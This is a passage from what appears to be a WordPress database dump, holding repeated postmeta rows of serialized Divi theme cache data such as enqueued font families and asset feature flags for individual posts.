:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32731,591,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32723,618,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32724,605,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32725,605,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32726,605,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32727,605,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32719,718,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32720,618,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32721,618,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32722,618,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32714,719,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32715,719,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32716,718,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32717,718,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32718,718,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32707,772,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32708,765,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32709,765,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32710,765,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32711,765,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32712,719,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32713,719,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32706,772,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32693,816,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32694,816,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32695,816,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32696,626,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32697,626,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32698,626,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32699,626,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32700,781,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32701,781,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32702,781,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32703,781,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32704,772,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32705,772,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32687,925,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32688,828,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32689,828,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32690,828,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32691,828,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32692,816,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32683,1628,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32684,925,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32685,925,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32686,925,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32680,1628,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32681,1628,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32682,1628,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32676,1083,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32677,1083,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32678,1083,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32679,1083,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32675,798,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i